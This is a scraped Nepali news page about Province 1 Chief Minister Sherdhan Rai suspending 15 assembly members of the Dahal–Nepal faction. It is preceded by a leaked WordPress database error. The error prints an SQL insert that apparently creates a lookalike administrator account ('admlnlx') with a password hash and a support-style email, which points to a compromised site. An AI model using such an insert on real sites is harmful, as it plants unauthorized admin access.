WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BC4vftoNhwHNQwbQUSqGhGUgtEt3/r1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 07:53:12', '', 'admlnlx', 'admlnlx')

मुख्यमन्त्री राईद्वारा दाहाल–नेपाल समूहका १५ सांसद निलम्बित – Gaule Khabar

मुख्यमन्त्री राईद्वारा दाहाल–नेपाल समूहका १५ सांसद निलम्बित

मुख्यमन्त्री राईद्वारा दाहाल–नेपाल समूहका १५ सांसद निलम्बित

काठमाडौं । सत्तारुढ नेपाल कम्युनिस्ट पार्टी (नेकपा)मा आएको फुटसँगै प्रदेश १ मा दुई समूहले एकअर्कालाई कारबाही गर्न थालएका छन् ।

बिहीबार प्रचण्ड–माधव समूहले मुख्यमन्त्री शेरधन राईलाई संसदीय दलको नेताबाट हटाउने निर्णय गरेको छ । र, भीम आचार्यलाई दलको नेता चयन गरेको छ । प्रतिउत्तरमा ओली समूहमा रहेका मुख्यमन्त्री राईले आर्चायसहित १५ प्रदेशसभा सदस्यदलाई तीन महिनाका लागि निलम्बन गरेको घोषणा गरेका छन् ।

यसअघि शनिबार मुख्यमन्त्री शेरधन राईले इन्द्र आङ्बोलाई मन्त्रीबाट हटाएका छन् भने आइतबार राईविरुद्ध अविश्वासको प्रस्ताव दर्ता भएको थियो ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका